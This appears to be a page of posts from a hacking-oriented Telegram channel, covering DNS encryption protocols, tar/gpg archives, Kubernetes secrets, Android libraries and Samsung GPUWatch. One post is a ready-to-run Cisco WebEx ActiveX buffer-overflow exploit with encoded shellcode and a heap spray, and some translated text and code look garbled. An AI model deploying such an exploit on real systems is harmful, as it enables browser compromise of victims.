UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How DNS over HTTPS, DNSSEC, DNSCrypt, DNS over TLS compare


Several protocols are available to encrypt DNS requests. DNS over HTTPS (DoH) is currently the best supported on client software, which is what this article is about. To navigate in terms, consider the brief characteristics of each of the protocols.

DNS over HTTPS (DoH) is a protocol for performing DNS resolution over HTTPS. The goal of this technique is to improve user privacy and security by preventing the interception and manipulation of DNS data through a broker attack.

DNS over TLS (DoT) is a proposed standard protocol for performing remote DNS resolution using TLS. The goal of this technique is to improve user privacy and security by preventing the interception and manipulation of DNS data through a broker attack.

DNSSEC (Domain Name System Security Extensions) is a set of extensions to the IETF DNS protocol that minimize attacks related to DNS spoofing when resolving domain names. It aims to provide DNS clients (the English term resolver) with authentic responses to DNS requests (or authentic information about the fact that there is no data) and ensure their integrity. This uses public key cryptography.

DNSCrypt is a network protocol that authenticates and encrypts Domain Name System (DNS) traffic between a user's computer and recursive name servers. It was originally developed by Frank Denis and Yecheng Fu.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Example code of cracked BAT batch source code in pseudo EXE :


@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...

net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit :

<html>
<body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target />
</object> <script language=javascript> // k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100"); var block = unescape("%u0909%u0909");
while (block.length < 0x25000) block = block; var memory = new Array(); var i=0;
for (;i<1000;i ) memory[i] = block shellcode; memory[i] = shellcode; var buf2;
for (var i=0; i<151; i ) buf2 = "X"; buf2 = unescape(" "); target.NewObject(buf2); </script> </body>
</html>

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘πŸ—„ How to create compressed encrypted archives with tar and gpg :

1) How to create a compressed archive
Before discussing creating encrypted archives, let's first take a look at how to create compressed tar archives.

2) Suppose you have a directory named folder that you want to archive, enter the following command:

$ tar -cvzf folder.tar.gz folder
The -c flag is used to create an archive, -v is used for verbose output so that we have visual feedback that lets us know that this is happening, and -z is used to compress the archive to make it smaller.

3) To unpack and extract this archive later, you must enter the following command.
$ tar -xvzf folder.tar.gz
the -x flag is used for extracting the archive, -v for verbose extraction, and -z for unpacking the archive.

πŸ•Ί How to Archive Files and Folders in Linux [Hint for Beginners]

πŸ¦‘ How to create an encrypted archive ?

1) Now that we have covered creating an archive using tar, let's see how to create an encrypted archive by adding gpg to it.

2) You can use key based encryption, password based encryption, or a combination of both.

πŸ¦‘How to encrypt / decrypt a file in Linux using gpg (Kali Linux)
πŸ‘­ How to generate GPG keys on Linux
therefore, we'll look at password-based encryption here.

To create an encrypted compressed archive of a directory named folder, enter the following command.

$ tar -cvzf - folder | gpg -c > folder.tar.gz.gpg

1) All tar flags are the same as in our previous example.
The only difference is that instead of specifying the filename for our archive in the tar command, we are specifying so that we can pipe the output of the tar command to gpg.

2) We then proceed to do just that, and the gpg's -c flag indicates that we want to encrypt the file with a symmetric cipher using the passphrase as we indicated above.

3) Finally, we redirect the output to a file named folder.tar.gz.gpg using>.
After entering this command, you will be prompted for the passphrase that you want to use to encrypt your data.

4) If you dislike this behavior and prefer to include the passphrase in your command, you can add the --passphrase flag after -c, as shown below.
$ tar -cvzf - folder | gpg -c --passphrase yourpassword > folder.tar.gz.gpg

5) To decrypt, unpack and extract this archive later, you must enter the following command.

$ gpg -d folder.tar.gz.gpg | tar -xvzf -
The -d flag tells gpg that we want to decrypt the contents of the file folder.tar.gz.gpg.
We then pass this to the tar command.
The -x flag is used to extract the archive transferred from gpg, -v for verbose extraction, -z for unpacking the archive.
How to create multiple separate encrypted directory archives
The examples above assume we want to create a single encrypted archive based on one directory. H

then what if we have a directory filled with multiple subdirectories, but we want to create a separate encrypted archive for each directory?

We can use a bash for loop.

Just go to the directory containing the subdirectories for which you want to create separate archives and enter the following command.

$ for i in * ; do tar -cvzf - "$i" | gpg -c --passphrase yourpassword > "$i".tar.gpg; done


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
UNDERCODE COMMUNITY
Anonymity complete GUIDE.rtf
01-first tip
02-introduction
3 - first tips
04 - about proxies
05 - cookies
06 - ftp transfers
07 - secure transactions
08 - SSL tunelling
09 - anonymity on irc
10 - mail crypto (and pgp usage)
11 - icq privacy
12 - spyware
13 - cleaning tracks
14 - ending words
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Are you a hacker’s dish? The trick to effectively prevent hackers from intruding :

1) The cyber attacker is an opportunist and will only choose the harder and easier

72% of the respondents said they would give up the attack if they could not go back to collect information at a high price in a short time.

The majority (73%) of respondents said they like to attack easy and low-cost targets.

2) Time is the enemy of cyber attackers

As long as the time required for the attack is increased by about two days (40 hours), the attack can be reduced by up to 60%.

On average, a skilled hacker will move on to other targets if it takes about a week (209 hours) to achieve the goal.

3) The rich income is just a legend

Generally, hackers make money from malicious attacks, and the average annual income is less than US$30,000, which is only a quarter of the annual salary of the average network security professional.

4) Fourth, a strong security system can increase the time to implement an attack

A skilled cyber attacker dealing with a "first-class" IT security facility requires twice the time (147 hours versus 70 hours) to plan and implement an attack than a "typical" IT security facility.

72% of respondents said that they would stop attacking organizations with strong defense capabilities.

πŸ¦‘What method can effectively prevent hackers from intruding

Make yourself a "difficult to attack" target

Adopting a security system that focuses on intrusion prevention, rather than passive detection and incident response, can increase the difficulty of hacker attacks and lengthen the time required for the attack to make the hacker give up the attack.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to see FPS, CPU load and other parameters in a game on a smartphone with Samsung One UI 3.0 ?

1) Unlocking settings for developers
The option is located in a hidden developer menu. To open it, you need to enter the system settings and go to the "About phone" section. There, find the "Program Information" section. Seven times in a row, click on the build number, after which you will need to enter the pin code, password or pattern that you use to unlock the device. After that, return to the main settings page and under the "About phone" section, the "For Developers" section will appear.

2) Enabling GPUWatch
Go to the "For Developers" section and scroll down to the "Games" subsection. Here select GPUWatch. Activate the switch on the next page.

3) Setting parameters
Three widgets give you all the information you need. They can be customized in different ways depending on your tastes. First, select general settings and the drop-down menu "Refresh interval". The frequency of data refresh is set here.

4) The next two sections control the appearance of the widgets. You can change the background color and transparency, as well as some other parameters.

On the home page, you can select individual widgets to customize their appearance. The ability to resize, rename widgets, turn on and off descriptions, change the color of graphs is given.

5) Use the floating button to add a widget, predefined or customized by you. In the case of predefined widgets, the information is grouped together by default. For example, CPU and GPU load may be related to FPS in one widget, but FPS and CPU load are not related in another. Custom widgets remove this limitation.

There are several additional options in the notification bar. Select "Unlock Widget" so you can move it. Select "Hide Widget" if you do not want to see graphs, but want to see information.

6) Setting performance parameters for your games
After activating and configuring GPUWatch, launch the game and view the data. Taking them into account, you can change the parameters of the game.

If you are not sure if the game supports 120fps, you can check in GPUWatch. If the machine is running slowly during the game, check the load on the CPU and GPU. You can monitor the impact of certain APIs such as OpenGL and Vulkan on the processor.

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Various libraries (Libraries) and Android runtime environment (RunTime) :


This level corresponds to the general embedded system and is equivalent to the middleware level. This level of Android is divided into two parts, one is various libraries, and the other is the Android runtime environment. The content of this layer is mostly implemented in C++. Among them, various libraries include:


1) C library: The standard library of C language, which is also one of the lowest level libraries in the system. The C library is implemented through Linux system calls.

2) Multimedia Framework (MediaFrameword): This part of the content is the core part of Android multimedia, based on PacketVideo (PV)

3) OpenCORE, functionally this library is divided into two parts, one part is the audio and video playback (PlayBack), and the other One part is audio and video records (Recorder).

4) SGL: 2D graphics engine.

5) SSL: The SecureSocket Layer is located between the TCP/IP protocol and various application layer protocols to provide security support for data communication.

6) OpenGL ES 1.0: This part provides support for 3D.

7) Interface management tool (Surface Management): This part provides functions such as managing the display subsystem.

8) SQLite: a general embedded database

9) WebKit: the core of the web browser

10) FreeType: The function of bitmap and vector font.

11) Various Android libraries are generally provided in the form of system middleware, and one of their distinctive features is that they are closely related to the applications of the mobile device platform. The Android operating environment mainly refers to the virtual machine technology-Dalvik. The Dalvik virtual machine is different from the general Java virtual machine (Java VM) in that it executes files in the Dalvik executable format (.dex) instead of the Java standard bytecode (bytecode). In the process of execution, each application is a process (a Process of Linux). The biggest difference between the two is that Java VM is a stack-based virtual machine (Stack-based), while Dalvik is a register-based virtual machine (Register-based). Obviously, the biggest advantage of the latter is that it can achieve greater optimization based on the hardware, which is more suitable for the characteristics of mobile devices.


don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘β˜ΈοΈ How to copy Kubernetes secrets between namespaces :

1) Creating Kubernetes secrets
We will create a secret with username and password from a file.

echo -n 'admin' > ./username.txt
echo -n 'Password' > ./password.txt

2) Run the kubectl create secret command to pack these files into a secret and create an object on the API server.

$ kubectl create secret generic my-user-pass --from-file=./username.txt --from-file=./password.txt
secret/my-user-pass created
Let's list our secrets:

$ kubectl get secrets

3) Copying Kubernetes secrets between namespaces
Use the following kubectl command syntax to copy a secret from one namespace to another namespace.

kubectl get secret <secret-name> \
--namespace=<source-nemespace> \
--export -o yaml | \
kubectl apply --namespace=<new-namespace> -f -

4) In my example, I will execute:

kubectl get secret my-user-pass \
--namespace=namespace1 \
--export -o yaml | \
kubectl apply --namespace=namespace2 -f -

5) Command execution output:

secret/my-user-pass created
Confirm the creation of the secret in the namespace.

$ kubectl get secret -n namespace2 my-user-pass
NAME TYPE DATA AGE
my-user-pass Opaque 2 38s

6) Decrypt the secret to confirm the correctness of the data:

secret_name="my-user-pass"
namespace="namespace2"
kubectl get secret -n $namespace $secret_name -o go-template='{{range $k,$v := .data}}{{printf "%s: " $k}}{{if not $v}}{{$v}}{{else}}{{$v | base64decode}}{{end}}{{"\n"}}{{end}}'

7) Command output:

password.txt: Password
username.txt: admin
If you have jq, you can use the following command to decrypt.

$ kubectl get secret my-user-pass -o json | jq '.data | map_values(@base64d)'
{
"password.txt": "Password",
"username.txt": "admin"

}

don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁